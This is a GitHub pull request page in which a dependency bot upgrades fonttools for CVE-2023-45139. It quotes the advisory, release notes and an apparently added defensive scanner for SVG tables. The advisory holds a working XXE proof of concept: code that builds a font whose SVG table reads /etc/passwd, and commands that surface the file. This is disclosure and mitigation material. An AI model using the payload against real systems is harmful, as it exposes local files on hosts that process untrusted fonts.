This repository has been archived by the owner on Jul 17, 2024. It is now read-only.

Update dependency fonttools to v4.43.0 [SECURITY] #404

Closed
wants to merge 1 commit into from

Conversation

renovate[bot]
Contributor

@renovate renovate bot commented Jan 9, 2024

Mend Renovate

This PR contains the following updates:

Package    Change
fonttools  ==4.37.4 -> ==4.43.0

GitHub Vulnerability Alerts

CVE-2023-45139

Summary

As of fonttools>=4.28.2 the subsetting module has an XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains an SVG table, is parsed.

This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system.

PoC

The vulnerability can be reproduced following the below steps on a unix based system.

  1. Build an OT-SVG font which includes an external entity in the SVG table which resolves a local file. In our testing we utilised /etc/passwd for our POC file to include and modified an existing subset integration test to build the POC font - see below.
from string import ascii_letters
from fontTools.fontBuilder import FontBuilder
from fontTools.pens.ttGlyphPen import TTGlyphPen
from fontTools.ttLib import newTable

XXE_SVG = """\
<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <g id="glyph1">
    <text font-size="10" x="0" y="10">&test;</text>
  </g>
</svg>
"""

def main():
    # generate a random TTF font with an SVG table
    glyph_order = [".notdef"] + list(ascii_letters)
    pen = TTGlyphPen(glyphSet=None)
    pen.moveTo((0, 0))
    pen.lineTo((0, 500))
    pen.lineTo((500, 500))
    pen.lineTo((500, 0))
    pen.closePath()
    glyph = pen.glyph()
    glyphs = {g: glyph for g in glyph_order}

    fb = FontBuilder(unitsPerEm=1024, isTTF=True)
    fb.setupGlyphOrder(glyph_order)
    fb.setupCharacterMap({ord(c): c for c in ascii_letters})
    fb.setupGlyf(glyphs)
    fb.setupHorizontalMetrics({g: (500, 0) for g in glyph_order})
    fb.setupHorizontalHeader()
    fb.setupOS2()
    fb.setupPost()
    fb.setupNameTable({"familyName": "TestSVG", "styleName": "Regular"})

    svg_table = newTable("SVG ")
    svg_table.docList = [
       (XXE_SVG, 1, 12)
    ]
    fb.font["SVG "] = svg_table

    fb.font.save('poc-payload.ttf')

if __name__ == '__main__':
    main()
  2. Subset the font with an affected version of fontTools - we tested on fonttools==4.42.1 and fonttools==4.28.2 - using the following flags (which just ensure the malicious glyph is mapped by the font and not discarded in the subsetting process):
pyftsubset poc-payload.ttf --output-file="poc-payload.subset.ttf" --unicodes="*" --ignore-missing-glyphs
  3. Read the parsed SVG table in the subsetted font:
ttx -t SVG poc-payload.subset.ttf && cat poc-payload.subset.ttx

Observe the included contents of the /etc/passwd file.

Impact

Note the final severity is dependent on the environment fontTools is running in.

  • The vulnerability has the most impact on consumers of fontTools who leverage the subsetting utility to subset untrusted OT-SVG fonts, where the vulnerability may be exploited to read arbitrary files from the filesystem of the host fontTools is running on.

Possible Mitigations

There may be other ways to mitigate the issue, but some suggestions:

  1. Set the resolve_entities=False flag on parsing methods
  2. Consider further methods of disallowing doctype declarations
  3. Consider recursive regex matching

Release Notes

fonttools/fonttools (fonttools)

v4.43.0

Compare Source

  • [subset] Set up lxml XMLParser(resolve_entities=False) when parsing OT-SVG documents to prevent XML External Entity (XXE) attacks (9f61271): https://codeql.github.com/codeql-query-help/python/py-xxe/
  • [varLib.iup] Added workaround for a Cython bug in iup_delta_optimize that was leading to IUP tolerance being incorrectly initialised, resulting in sub-optimal deltas (6012643, cython/cython#5732).
  • [varLib] Added new command-line entry point fonttools varLib.avar to add an avar table to an existing VF from axes mappings in a .designspace file (0a3360e).
  • [instancer] Fixed bug whereby no longer used variation regions were not correctly pruned after VarData optimization (#​3268).
  • Added support for Python 3.12 (#​3283).

v4.42.1

Compare Source

  • [t1Lib] Fixed several Type 1 issues (#​3238, #​3240).
  • [otBase/packer] Allow sharing tables reached by different offset sizes (#​3241, #​3236, 457f11c).
  • [varLib/merger] Fix Cursive attachment merging error when all anchors are NULL (#​3248, #​3247).
  • [ttLib] Fixed warning when calling addMultilingualName and ttFont parameter was not passed on to findMultilingualName (#​3253).

v4.42.0

Compare Source

  • [varLib] Use sentinel value 0xFFFF to mark a glyph advance in hmtx/vmtx as non participating, allowing sparse masters to contain glyphs for variation purposes other than {H,V}VAR (#​3235).
  • [varLib/cff] Treat empty glyphs in non-default masters as missing, thus not participating in CFF2 delta computation, similarly to how varLib already treats them for gvar (#​3234).
  • Added varLib.avarPlanner script to deduce 'correct' avar v1 axis mappings based on glyph average weights (#​3223).

v4.41.1

Compare Source

  • [subset] Fixed perf regression in v4.41.0 by making NameRecordVisitor only visit tables that do contain nameID references (#​3213, #​3214).
  • [varLib.instancer] Support instancing fonts containing null ConditionSet offsets in FeatureVariationRecords (#​3211, #​3212).
  • [statisticsPen] Report font glyph-average weight/width and font-wide slant.
  • [fontBuilder] Fixed head.created date incorrectly set to 0 instead of the current timestamp, regression introduced in v4.40.0 (#​3210).
  • [varLib.merger] Support sparse CursivePos masters (#​3209).

v4.41.0

Compare Source

  • [fontBuilder] Fixed bug in setupOS2 with default panose attribute incorrectly being set to a dict instead of a Panose object (#​3201).
  • [name] Added method to removeUnusedNameRecords in the user range (#​3185).
  • [varLib.instancer] Fixed issue with L4 instancing (moving default) (#​3179).
  • [cffLib] Use latin1 so we can roundtrip non-ASCII in {Full,Font,Family}Name (#​3202).
  • [designspaceLib] Mark as optional in docs (as it is in the code).
  • [glyf-1] Fixed drawPoints() bug whereby last cubic segment becomes quadratic (#​3189, #​3190).
  • [fontBuilder] Propagate the 'hidden' flag to the fvar Axis instance (#​3184).
  • [fontBuilder] Update setupAvar() to also support avar 2, fixing _add_avar() call site (#​3183).
  • Added new voltLib.voltToFea submodule (originally Tiro Typeworks' "Volto") for converting VOLT OpenType Layout sources to FEA format (#​3164).

v4.40.0

Compare Source

  • Published native binary wheels to PyPI for all the python minor versions and platform and architectures currently supported that would benefit from this. They will include precompiled Cython-accelerated modules (e.g. cu2qu) without requiring to compile them from source. The pure-python wheel and source distribution will continue to be published as always (pip will automatically choose them when no binary wheel is available for the given platform, e.g. pypy). Use pip install --no-binary=fonttools fonttools to explicitly request pip to install from the pure-python source.
  • [designspaceLib|varLib] Add initial support for specifying axis mappings and build avar2 table from those (#​3123).
  • [feaLib] Support variable ligature caret position (#​3130).
  • [varLib|glyf] Added option to --drop-implied-oncurves; test for impliable oncurve points either before or after rounding (#​3146, #​3147, #​3155, #​3156).
  • [TTGlyphPointPen] Don't error with empty contours, simply ignore them (#​3145).
  • [sfnt] Fixed str vs bytes remnant of py3 transition in code dealing with de/compiling WOFF metadata (#​3129).
  • [instancer-solver] Fixed bug when moving default instance with sparse masters (#​3139, #​3140).
  • [feaLib] Simplify variable scalars that don’t vary (#​3132).
  • [pens] Added filter pen that explicitly emits closing line when lastPt != movePt (#​3100).
  • [varStore] Improve optimize algorithm and better document the algorithm (#​3124, #​3127).
    Added quantization option (#​3126).
  • Added CI workflow config file for building native binary wheels (#​3121).
  • [fontBuilder] Added glyphDataFormat=0 option; raise error when glyphs contain cubic outlines but glyphDataFormat was not explicitly set to 1 (#​3113, #​3119).
  • [subset] Prune emptied GDEF.MarkGlyphSetsDef and remap indices; ensure GDEF is subsetted before GSUB and GPOS (#​3114, #​3118).
  • [xmlReader] Fixed issue whereby DSIG table data was incorrectly parsed (#​3115, #​2614).
  • [varLib/merger] Fixed merging of SinglePos with pos=0 (#​3111, #​3112).
  • [feaLib] Demote "Feature has not been defined" error to a warning when building aalt and referenced feature is empty (#​3110).
  • [feaLib] Dedupe multiple substitutions with classes (#​3105).

v4.39.4

Compare Source

v4.39.3

Compare Source

v4.39.2

Compare Source

  • [varLib] Fixed regression introduced in 4.39.1 whereby an incomplete 'STAT' table would be built even though a DesignSpace v5 did contain 'STAT' definitions (#​3045, #​3046).

NOTE: The 4.39.1 distribution was "yanked" from PyPI to prevent users from accidentally upgrading to it.

v4.39.1

Compare Source

v4.39.0

Compare Source

  • [mtiLib] Optionally add Debg debug info for MTI feature builds (#​3018).
  • [ttx] Support reading input file from standard input using special - character, similar to existing -o - option to write output to standard output (#​3020).
  • [cython] Prevent cython.compiled raise AttributeError if cython not installed properly (#​3017).
  • [OS/2] Guard against ZeroDivisionError when calculating xAvgCharWidth in the unlikely scenario no glyph has non-zero advance (#​3015).
  • [subset] Recompute xAvgCharWidth independently of --no-prune-unicode-ranges, previously the two options were involuntarily bundled together (#​3012).
  • [fontBuilder] Add debug parameter to addOpenTypeFeatures method to add source debugging information to the font in the Debg private table (#​3008).
  • [name] Make NameRecord __lt__ comparison not fail on Unicode encoding errors (#​3006).
  • [featureVars] Fixed bug in overlayBox (#​3003, #​3005).
  • [glyf] Added experimental support for cubic bezier curves in TrueType glyf table, as outlined in glyf v1 proposal (#​2988):
    https://github.com/harfbuzz/boring-expansion-spec/blob/main/glyf1-cubicOutlines.md
  • Added new qu2cu module and related qu2cuPen, the reverse of cu2qu for converting TrueType quadratic splines to cubic bezier curves (#​2993).
  • [glyf] Added experimental support for reading and writing Variable Composites/Components as defined in glyf v1 spec proposal (#​2958):
    https://github.com/harfbuzz/boring-expansion-spec/blob/main/glyf1-varComposites.md.
  • [pens]: Added addVarComponent method to pen protocols' base classes, which pens can implement to handle varcomponents (by default they get decomposed).
  • [misc.transform] Added DecomposedTransform class which implements an affine transformation with separate translate, rotation, scale, skew, and transformation-center components (#​2598)
  • [sbix] Ensure Glyph.referenceGlyphName is set; fixes error after dumping and re-compiling sbix table with 'dupe' glyphs (#​2984).
  • [feaLib] Be cleverer when merging chained single substitutions into same lookup when they are specified using the inline notation (#​2150, #​2974).
  • [instancer] Clamp user-inputted axis ranges to those of fvar (#​2959).
  • [otBase/subset] Define __getstate__ for BaseTable so that a copied/pickled 'lazy' object gets its own OTTableReader to read from; incidentally fixes a bug while subsetting COLRv1 table containing ClipBoxes on python 3.11 (#​2965, #​2968).
  • [sbix] Handle glyphs with "dupe" graphic type on compile correctly (#​2963).
  • [glyf] endPointsOfContours field should be unsigned! Kudos to behdad for spotting one of the oldest bugs in FT. Probably nobody has ever dared to make glyphs with more than 32767 points... (#​2957).
  • [feaLib] Fixed handling of ignore statements with unmarked glyphs to match makeotf behavior, which assumes the first glyph is marked (#​2950).
  • Reformatted code with black and enforce new code style via CI check (#​2925).
  • [feaLib] Sort name table entries following OT spec prescribed order in the builder (#​2927).
  • [cu2quPen] Add Cu2QuMultiPen that converts multiple outlines at a time in interpolation compatible way; its methods take a list of tuples arguments that would normally be passed to individual segment pens, and at the end it dispatches the converted outlines to each pen (#​2912).
  • [reverseContourPen/ttGlyphPen] Add outputImpliedClosingLine option (#​2913, #​2914, #​2921, #​2922, #​2995).
  • [gvar] Avoid expanding all glyphs unnecessarily upon compile (#​2918).
  • [scaleUpem] Fixed bug whereby CFF2 vsindex was scaled; it should not (#​2893, #​2894).
  • [designspaceLib] Add DS.getAxisByTag and refactor getAxis (#​2891).
  • [unicodedata] map Zmth<->math in ot_tag_{to,from}_script (#​1737, #​2889).
  • [woff2] Support encoding/decoding OVERLAP_SIMPLE glyf flags (#​2576, #​2884).
  • [instancer] Update OS/2 class and post.italicAngle when default moved (L4)
  • Dropped support for Python 3.7 which reached EOL, fontTools requires 3.8+.
  • [instancer] Fixed instantiateFeatureVariations logic when a rule range becomes default-applicable (#​2737, #​2880).
  • [ttLib] Add main to ttFont and ttCollection that just decompile and re-compile the input font (#​2869).
  • [featureVars] Insert 'rvrn' lookup at the beginning of LookupList, to work around bug in Apple implementation of 'rvrn' feature which the spec says it should be processed early whereas on macOS 10.15 it follows lookup order (#​2140, #​2867).
  • [instancer/mutator] Remove 'DSIG' table if present.
  • [svgPathPen] Don't close path in endPath(), assume open unless closePath() (#​2089, #​2865).

v4.38.0

Compare Source

  • [varLib.instancer] Added support for L4 instancing, i.e. moving the default value of an axis while keeping it variable. Thanks Behdad! (#​2728, #​2861).
    It's now also possible to restrict an axis min/max values beyond the current default value, e.g. a font wght has min=100, def=400, max=900 and you want a partial VF that only varies between 500 and 700, you can now do that. You can either specify two min/max values (wght=500:700), and the new default will be set to either the minimum or maximum, depending on which one is closer to the current default (e.g. 500 in this case). Or you can specify three values (e.g. wght=500:600:700) to set the new default value explicitly.
  • [otlLib/featureVars] Set a few Count values so one doesn't need to compile the font to update them (#​2860).
  • [varLib.models] Make extrapolation work for 2-master models as well where one master is at the default location (#​2843, #​2846).
    Add optional extrapolate=False to normalizeLocation() (#​2847, #​2849).
  • [varLib.cff] Fixed sub-optimal packing of CFF2 deltas by no longer rounding them to integer (#​2838).
  • [scaleUpem] Calculate numShorts in VarData after scale; handle CFF hintmasks (#​2840).

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


This PR has been generated by Mend Renovate. View repository job log here.
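The advisory above describes reading arbitrary files through an entity declared in an OT-SVG font's SVG table, and lists "disallowing doctype declarations" as a mitigation next to upstream's actual fix (lxml XMLParser(resolve_entities=False), shipped in v4.43.0). The following script is an added example, not fontTools code or the advisory's PoC: it parses a raw OpenType 'SVG ' table with the standard library only, gunzips compressed documents (the table format allows gzip, so a byte-grep on the raw table would miss a compressed payload), and rejects any document carrying a DOCTYPE or ENTITY declaration before an XML parser ever sees it. The table layout follows the OpenType 'SVG ' table specification; the sample documents and the sample table are constructed in-code, and the hypothetical helper names (unsafe_reason, scan_svg_table, safe_parse_svg) are this example's own.

```python
# Added example (not fontTools code): scan an OT-SVG font's 'SVG ' table for
# documents that could trigger XXE, and only hand DTD-free documents to a parser.
# The table layout follows the OpenType 'SVG ' table spec; the sample data below
# is constructed in-code so the script runs offline.
import gzip
import re
import struct
import xml.etree.ElementTree as ET

# Constructed sample documents; the first mirrors the advisory's payload shape.
XXE_SVG = b"""<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<svg xmlns="http://www.w3.org/2000/svg">
  <g id="glyph1"><text font-size="10" x="0" y="10">&test;</text></g>
</svg>
"""
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg">
  <g id="glyph2"><rect x="0" y="0" width="500" height="500"/></g>
</svg>
"""

# Any DTD at all is rejected: a glyph document has no legitimate use for one, and
# blocking the DOCTYPE removes internal-entity expansion tricks as well as SYSTEM
# entities. The check is deliberately conservative (false positives are rejections).
_DTD_MARKERS = (
    (re.compile(rb"<!DOCTYPE\b", re.IGNORECASE), "DOCTYPE declaration"),
    (re.compile(rb"<!ENTITY\b", re.IGNORECASE), "ENTITY declaration"),
)


def unsafe_reason(doc: bytes):
    """Return why `doc` must not be parsed, or None if no DTD markers are present."""
    for pattern, reason in _DTD_MARKERS:
        if pattern.search(doc):
            return reason
    return None


def build_svg_table(entries):
    """Serialise an OpenType 'SVG ' table (version 0) from
    (doc_bytes, start_gid, end_gid, gzip_compress) tuples.

    Header: uint16 version, Offset32 svgDocumentListOffset, uint32 reserved (10 bytes).
    Document list: uint16 numEntries, then 12-byte records
    (startGlyphID, endGlyphID, svgDocOffset, svgDocLength); svgDocOffset is
    relative to the start of the document list.
    """
    entries = list(entries)
    header = struct.pack(">HII", 0, 10, 0)
    records = []
    blobs = b""
    first_doc = 2 + 12 * len(entries)
    for doc, start, end, compress in entries:
        blob = gzip.compress(doc) if compress else doc
        records.append(struct.pack(">HHII", start, end, first_doc + len(blobs), len(blob)))
        blobs += blob
    return header + struct.pack(">H", len(entries)) + b"".join(records) + blobs


def parse_svg_table(table: bytes):
    """Yield (start_gid, end_gid, doc_bytes) per record, gunzipping where needed.

    Bounds are checked explicitly so a malformed record cannot read outside
    the table; struct.unpack_from raises on a truncated header or record.
    """
    version, list_off, _reserved = struct.unpack_from(">HII", table, 0)
    if version != 0:
        raise ValueError(f"unsupported SVG table version {version}")
    (num_entries,) = struct.unpack_from(">H", table, list_off)
    for i in range(num_entries):
        start, end, doc_off, doc_len = struct.unpack_from(">HHII", table, list_off + 2 + 12 * i)
        begin = list_off + doc_off
        blob = table[begin:begin + doc_len]
        if len(blob) != doc_len:
            raise ValueError(f"record {i}: document runs past end of table")
        if blob[:2] == b"\x1f\x8b":  # gzip magic: documents may be stored compressed
            blob = gzip.decompress(blob)
        yield start, end, blob


def scan_svg_table(table: bytes):
    """Return [(start_gid, end_gid, reason)] for every document that must be rejected."""
    findings = []
    for start, end, doc in parse_svg_table(table):
        reason = unsafe_reason(doc)
        if reason:
            findings.append((start, end, reason))
    return findings


def safe_parse_svg(doc: bytes) -> ET.Element:
    """Refuse DTD-bearing documents before any XML parser touches them."""
    reason = unsafe_reason(doc)
    if reason:
        raise ValueError(f"refusing to parse SVG document: {reason}")
    return ET.fromstring(doc)


# Constructed sample table: the XXE document is gzip-compressed on purpose.
SAMPLE_TABLE = build_svg_table([
    (XXE_SVG, 1, 1, True),
    (BENIGN_SVG, 2, 2, False),
])

if __name__ == "__main__":
    for start, end, reason in scan_svg_table(SAMPLE_TABLE):
        print(f"glyphs {start}-{end}: {reason}")
```

Running it reports the compressed glyph-1 document as carrying a DOCTYPE declaration while the glyph-2 document passes. The pre-parse rejection is independent of which XML library sits behind it, which matters here because fontTools uses lxml when it is installed and falls back to the standard library otherwise; a parser-level setting such as resolve_entities=False only protects the code path that sets it.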

@skef skef closed this Jul 17, 2024
Contributor Author

renovate bot commented Jul 17, 2024

Renovate Ignore Notification

Because you closed this PR without merging, Renovate will ignore this update (==4.43.0). You will get a PR once a newer version is released. To ignore this dependency forever, add it to the ignoreDeps array of your Renovate config.

If you accidentally closed this PR, or if you changed your mind: rename this PR to get a fresh replacement PR.

@renovate renovate bot deleted the renovate/pypi-fonttools-vulnerability branch July 17, 2024 22:07